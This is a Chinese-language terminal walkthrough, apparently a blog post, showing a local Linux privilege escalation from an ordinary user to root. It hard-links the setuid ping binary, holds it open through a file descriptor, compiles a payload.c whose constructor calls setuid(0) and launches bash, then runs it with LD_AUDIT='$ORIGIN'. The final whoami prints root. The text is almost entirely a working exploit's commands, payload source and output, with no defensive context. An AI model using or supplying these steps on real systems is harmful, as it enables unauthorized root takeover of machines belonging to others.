首先创建一个普通用户,并且给普通用户设置一个密码,保证能用su 命令能用普通用户登录

[root@icsoc ~]# useradd test

[root@icsoc ~]# passwd test

New password: 

Retype new password:

passwd: all authentication tokens updated successfully.

[root@icsoc ~]# su - test

[test@icsoc ~]$ whoami 

test                            //登陆到普通用户,发现创建不了其他用户

[test@icsoc ~]$ useradd aaa

-bash: /usr/sbin/useradd: Permission denied

进行身份变换

[test@icsoc ~]$ mkdir /tmp/exploit

[test@icsoc ~]$ ln /bin/ping /tmp/exploit/target

[test@icsoc exploit]$  exec 3< /tmp/exploit/target

[test@icsoc exploit]$ ls -l /proc/$$/fd/3

lr-x------ 1 test test 64 Aug 17 21:41 /proc/35612/fd/3 -> /tmp/exploit/target

[test@icsoc exploit]$ rm -rf /tmp/exploit/

[test@icsoc exploit]$ ls -l /proc/$$/fd/3

[test@icsoc ~]$ vim payload.c 

void __attribute__((constructor)) init()     //在配置文件加入如下的内容

{

    setuid(0);

    system("/bin/bash");

}

~           

[test@icsoc ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

[test@icsoc ~]$ ls -l /tmp/exploit

[test@icsoc ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3

Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]

            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]

            [-M mtu discovery hint] [-S sndbuf]

            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination

[root@icsoc ~]# whoami 

root

发现身份变成了 root用户。身份变换成功!